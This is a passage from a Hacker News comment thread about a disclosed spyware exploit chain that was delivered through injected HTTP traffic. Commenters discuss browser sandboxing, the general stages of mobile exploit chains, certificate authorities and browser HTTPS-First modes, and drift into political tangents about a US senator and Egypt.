           | but then the browser itself is sandboxed so it can't do
           | things like access OS APIs it doesn't have permission for,
           | install apps that run in the background, etc. This is why the
           | iOS example needed 3 exploits chained. The fact that a
           | similar example worked on Android, which also has app
           | sandboxing, implies there should be an exploit chain but
           | we've only been told of the first.
        
             | waihtis wrote:
             | Gotcha, thank you.
        
             | codedokode wrote:
             | But browsers, especially Chrome, have lots of permissions
             | (including geolocation, accessing SD card, accessing user's
             | personal data, camera and microphone etc.). You don't need
             | to do anything if you can run under browser's privileges.
        
               | roblabla wrote:
               | None of the mentioned privileges should net you a
               | persistence though, so there's clearly still another
               | vulnerability.
        
             | tester756 wrote:
             | that sounds like terrible joke
             | 
             | sandbox in sandbox in sandbox in sandbox in sandbox in
             | sandbox in sandbox
             | 
             | and stuff still manages to escape
        
               | appplication wrote:
               | That's the thing about sand. It's course and rough and
               | irritating and it gets everywhere.
        
               | hollander wrote:
               | But there is always time for a glass of good wine!
        
             | insanitybit wrote:
             | There's also SELinux on Android.
        
           | fullspectrumdev wrote:
           | On Android, you usually need three exploits.
           | 
           | 1. Chrome code execution (gain foothold inside Chrome
           | process).
           | 
           | 2. Sandbox escape (gain code execution outside the Chrome
           | sandbox, with the privileges of the Chrome process, which
           | aren't very useful except to stage another exploit).
           | 
           | 3. Local privilege escalation, usually a kernel bug or
           | similar, to elevate to root where you can break the process
           | "sandbox" and establish persistence.
        
       | [deleted]
        
         | [deleted]
        
       | fh9302 wrote:
       | The article doesn't mention it but Lockdown Mode on iOS blocked
       | this exploit chain.
        
       | shmatt wrote:
       | Another company founded by ex-Israeli intelligence.
       | 
       | The funny thing about exploits is, once hundreds of employees or
       | soldiers have access to the exploit, they don't need to
       | physically copy the code. They just need to understand how it
       | works, to then open 10 other companies that use the same exploit,
       | or sell it to 20 other companies on the dark web.
       | 
       | Although the IDF is great at stopping people from copying files
       | outside of their networks, it can't stop people from remembering
       | what they did during their service
        
         | alephnerd wrote:
         | For every 1 zero day, there are around 10-20 others that
         | haven't been publicized. You can make plenty of money by trying
         | to find a niche and concentrating on that (eg. android
         | exploitation, iOS exploitation, Windows exploitation, APAC
         | buyers, US Defense buyers, Middle Eastern buyers, EU buyers,
         | etc).
        
         | [deleted]
        
       | arkj wrote:
       | Google search to intellexa results in an http site which got
       | redirected. I am now installing the update.
        
       | [deleted]
        
       | alephnerd wrote:
       | Slighty related, but Senator Bob Menendez was just indicted for
       | taking bribes from people connected with the Egyptian military
       | [0]. Gotta say, the Egyptian intelligence services are definitely
       | punching above their weight by regional power standards.
       | 
       | [0] - https://www.politico.com/news/2023/09/22/egypt-guns-money-
       | me...
        
         | Ozzie_osman wrote:
         | From the Google disclosure I can't tell what Egypt has to do
         | with this though. Intellexa is a Greek firm founded by an ex-
         | IDF (aka Israeli) guy. In general, while Egypt has definitely
         | been caught using tech like this, it rarely has the
         | sophistication to develop it itself.
        
         | lainga wrote:
         | Hey, they nearly destroyed the Ottoman Empire in the 1840s...
        
         | KoftaBob wrote:
         | Probably part of the long running (now peaceful) rivalry they
         | have with Israel.
        
           | alephnerd wrote:
           | Yep! Totally forgot about that!
        
         | WarOnPrivacy wrote:
         | > Senator Bob Menendez was just indicted for taking bribes from
         | people connected with the Egyptian military
         | 
         | At a federal level law/power is continually traded for
         | cash/favors. Heck, DoJ itself gets deployed in response to
         | lobbyist demands (eg:copyright enforcement).
         | 
         | From what I see this case was egregious _and_ involved a non-
         | favored foreign state. Maybe that 's the bar at which DoJ
         | begins to care about political ethics.
        
           | pakyr wrote:
           | > involved a non-favored foreign state
           | 
           | Egypt is not 'non-favored'. The US has very close ties with
           | Egypt's dictatorial regime[0], despite its awful domestic
           | human rights record[1].
           | 
           | [0]https://thehill.com/blogs/congress-blog/foreign-
           | policy/58552...
           | 
           | [1]https://www.amnesty.org/en/latest/news/2022/09/egypt-
           | human-r...
        
             | WarOnPrivacy wrote:
             | > Egypt is not 'non-favored'.
             | 
             | The WTO sets the MFN list and Egypt isn't on it so strictly
             | speaking you aren't correct.
             | 
             | Besides incurring WTO favor, the US also bestows it's own
             | preferential treatments to those same nations. Egypt has
             | long received many of those preferences so you're right in
             | the ways that are most relevant.
             | 
             | That said, I wouldn't place Egypt on US's _BFFs! Top
             | partners in crime_ list - the one that includes 5 /8 eyes
             | nations and Israel.
        
           | alephnerd wrote:
           | > law/power is continually traded for cash/favors
           | 
           | I worked on the Hill and that's not how it works. Yes,
           | lobbying happens, but the what Menendez is indicted for goes
           | well beyond anything a lobbyist would do legally. On top of
           | that, foreign lobbyists need to formally register with the
           | DoJ, which obviously didn't happen, but that's just the icing
           | on the cake.
        
             | WarOnPrivacy wrote:
             | >> law/power is continually traded for cash/favors
             | 
             | > I worked on the Hill and that's not how it works.
             | 
             | Your are asserting that law/power is not continually traded
             | for cash/favors. That's a pretty clear assertion and I
             | appreciate it.
             | 
             | To follow, you would also assert that this chain doesn't
             | exist in any meaningful way:
             | 
             | Major campaign donations are used by legislator ->
             | Legislator benefiting from funds is critical to creation of
             | law/regulation or to enactment of federal action taken that
             | is favorable to donor -> Influential/lucrative, positions
             | that benefit the legislator (or their interest) _are made
             | available to the legislator (during /after the elected
             | term)_ by the donor.
             | 
             | recap: You are asserting that what I describe above is not
             | occurring on an ongoing basis, correct?
        
         | [deleted]
        
       | hedora wrote:
       | Though HTTPS is better than nothing, and this attack relies on
       | HTTP to inject the initial payload, state sponsored attackers in
       | some countries can likely just subvert CA or CDN infrastructure
       | instead.
        
         | pipo234 wrote:
         | Or get someone to click on a spoofed domain, certified by our
         | beloved LetsEncrypt! Apparently al that is needed is an HTTP
         | 302/307 redirect response (or html redirect payload, maybe even
         | DNS?) pointing the client toward c.betly[.]me
        
           | jefftk wrote:
           | _> certified by our beloved LetsEncrypt_
           | 
           | Are you saying that CAs should be refusing to issue certs for
           | potentially spoofed domains?
        
             | pipo234 wrote:
             | ...or Digicert, Globalsign, the Hongkong post office,
             | whichever CA is in your truststore.
             | 
             | I just mentioned LetsEncrypt because it's free and
             | exceptionally easy to use. I'm not implying in any way they
             | aren't providing a great service, it's just that that
             | service also gets misused because it's cheap and easy.
        
               | xcdzvyn wrote:
               | It really sounds that way, FYI. I interpreted it as a dig
               | at LetsEncrypt in particular.
        
               | pipo234 wrote:
               | Please accept my apologies :-)
        
           | glaucon wrote:
           | I'm interested at your suggestion that Digicert et al are
           | doing some sort of "keeping the streets safe" checking. I
           | have zero experience of using them but I thought all they
           | were doing was confirming the applicant represented some
           | entity that matched the domain name. If I manage to get a
           | company registered called G00gle, buy a corresponding domain
           | and then send them my $500 are you suggesting they're going
           | to refuse to issue a certificate?
           | 
           | My impression was the CA's made the likes of Standard and
           | Poor look rigorous, but I'm happy to learn more from actual
           | experience of them rejecting such an application.
        
             | pipo234 wrote:
             | You are absolutely right, that (for plain, domain
             | attestation) paid CAs are exactly as trustworthy as
             | LetsEncrypt, and often much less (remember the Diginotar
             | debacle, for example). "Keeping the streets safe" is not
             | their responsibility, except in a very limited sense. The
             | $500 extended validation was mostly paper work and snake
             | oil.
             | 
             | My point wasn't to discredit LetsEncrypt, but to point out
             | that Google's claim to mitigate the MITM attack vector with
             | _https-first_ wasn 't a very strong argument. I mean, yes,
             | sure: if you can't intercept or downgrade to HTTP the MITM
             | doesn't work. But all the HTTP seems to do was _redirect_
             | to a malicious payload. But you can also do a redirect in
             | HTTPS.
             | 
             | So if you can spoof someone to go to https://g00gle.com/ it
             | should be just as easy to launch the attack chain from
             | there.
        
             | vngzs wrote:
             | I don't see GP claiming CAs should be checking reputability
             | for domain issuance certificates. But the thread originator
             | mentioned subverting CAs! Something to remember about even
             | the most advanced attackers is that they value the
             | continued effectiveness of their tactics, tools and
             | procedures. Even nation-states in possession of CA
             | subversion abilities won't burn their malicious CA on
             | someone if they can conduct the attack with a legitimately-
             | issued certificate, and they won't bother with a
             | legitimately-issued cert if they can conduct the attack
             | without even involving a CA.
        
               | glaucon wrote:
               | I was referring to this comment
               | https://news.ycombinator.com/item?id=37615985
        
             | [deleted]
        
           | insanitybit wrote:
           | Huge difference between being tricked into clicking a link vs
           | just browsing the web and getting owned.
        
             | aidos wrote:
             | Is there?
        
               | insanitybit wrote:
               | Yes. The move from 0 to 1 click exploits (thanks to
               | putting Flash/Java behind a click) in the early 2000s
               | marked a massive negative shift in attacker capabilities
               | and ultimately destroyed multiple (black market) exploit
               | dev businesses.
        
               | fullspectrumdev wrote:
               | "Click to play" bypasses became incredibly valuable as an
               | enabler for Flash/Java exploits, for a while. They were
               | also few and far between, and if memory serves me,
               | unreliable as fuck.
        
               | pipo234 wrote:
               | It definitely matters. Just think about what sort of how
               | much Dr. Evil would pay for an exploit that relies on
               | user action versus one that doesn't.
               | 
               | https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator
        
               | autoexec wrote:
               | I can probably avoid bring tricked into clicking a link,
               | I've avoided many many attempts to trick me in the past.
               | I probably can't avoid browsing the internet though.
        
       | adm_ wrote:
       | Related recent episode of Darknet Diaries about the Predator
       | spyware: https://darknetdiaries.com/episode/137/.
        
       | cotillion wrote:
       | Ouch.
       | 
       | Apparently Firefox has "Https First" also but requires the pref
       | dom.security.https_first to be set.
       | 
       | "HTTPS-Only Mode" is obviously best if you can do that.
        
         | rany_ wrote:
         | You'd still need to resist the urge to not press "allow me
         | anyway" and to be honest, even I'd click it knowing the risk (I
         | just want to visit the damn site!). This doesn't solve anything
         | unless the prompt is extremely suspicious (like the prompt
         | showing for Google.com or some other site I know supports
         | HTTPS).
        
           | rany_ wrote:
           | Replying to myself but also, they could easily trick you into
           | clicking some link and exploiting you that way. HTTP isn't
           | the issue here, it's just being exploited so they don't have
           | to get you to click some link.
           | 
           | In all likelihood they'd do that if the less direct/obvious
           | method of transmission didn't work.
        
       | AtNightWeCode wrote:
       | I don't get it. If it is over http then you can play around with
       | anything in a proxy. You have no TLS tunnel so it is not
       | encrypted. It is by design.
        
         | vngzs wrote:
         | That's just the delivery method, not the exploit.
        
         | d3w4s9 wrote:
         | Yes it is not encrypted and the response returned from server
         | can be modified to anything and ask for password etc, but that
         | is far from an exploit that runs native code.
        
       ___________________________________________________________________
       (page generated 2023-09-22 23:00 UTC)